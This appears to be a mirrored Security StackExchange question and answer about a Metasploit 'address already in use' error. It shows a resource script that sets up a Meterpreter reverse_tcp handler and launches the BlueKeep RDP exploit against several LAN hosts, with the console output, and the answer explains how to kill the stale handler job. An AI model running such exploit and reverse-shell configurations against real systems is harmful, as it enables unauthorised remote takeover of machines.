首页
学习
活动
专区
圈层
工具
发布
社区首页 >问答首页 >Rex::BindFailed地址已在使用或不可用

Rex::BindFailed地址已在使用或不可用
EN

Security用户
提问于 2021-07-12 12:43:57
回答 1查看 5.7K关注 0票数 1

我正在尝试基于这个博客运行以下脚本。

代码语言:javascript
复制
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
setg autorunscript multi_console_command -rc /root/Desktop/folder/met_cmd_file 
setg lhost 192.168.0.90    
setg lport 4444
set ExitOnSession false 
exploit -j
use exploit/windows/rdp/rdp_bluekeep
set EXITFUNC thread
exploit -j

然而,我得到了这些错误:

代码语言:javascript
复制
[*] Started reverse TCP handler on 192.168.0.90:4444 
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
resource (/root/Desktop/folder/con_cmd_file)> set EXITFUNC thread
EXITFUNC => thread
resource (/root/Desktop/folder/con_cmd_file)> exploit -j
[-] Exploit failed: One or more options failed to validate: RHOST.
[*] Exploit completed, but no session was created.
rhost => 192.168.0.40
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
rhost => 192.168.0.50
[-] Handler failed to bind to 192.168.0.90:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
rhost => 192.168.0.70
[-] Handler failed to bind to 192.168.0.90:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.
rhost => 192.168.0.80
[*] Exploit running as background job 4.
[*] Exploit completed, but no session was created.
[-] Handler failed to bind to 192.168.0.90:4444:-  -

[-] Handler failed to bind to 0.0.0.0:4444:-  -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[-] Handler failed to bind to 192.168.0.90:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).

我已经尝试了建议的这里,通过这样做:

代码语言:javascript
复制
netstat -anpl | grep :4444
tcp        0      0 192.168.0.90:4444       0.0.0.0:*               LISTEN      1741/ruby

在运行以下命令时,我一无所获:

代码语言:javascript
复制
  netstat -anpl | grep :4445

但是,无论我使用4444还是4445,结果都是一样的。

运行jobs显示:

代码语言:javascript
复制
0   Exploit: multi/handler  windows/x64/meterpreter/reverse_tcp  tcp://192.168.0.90:4444

但我怎么能杀了这份工作?怎么解决这个问题呢?

EN

回答 1

Security用户

发布于 2022-01-17 21:45:28

0漏洞:多/处理程序windows/x64/meterpreter/反向tcp_ tcp://192.168.0.90:4444

您有一个现有的“作业”(在后台运行的命令),即端口4444。要杀死它,运行kill X,其中X是作业的ID,在本例中是0。因此,您必须运行kill 0来阻止它。

netstat -anpl | grep :4445没有显示任何结果,因为端口可能没有被使用。使用中的是4444港。

票数 1
EN
页面原文内容由Security提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://security.stackexchange.com/questions/252284

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档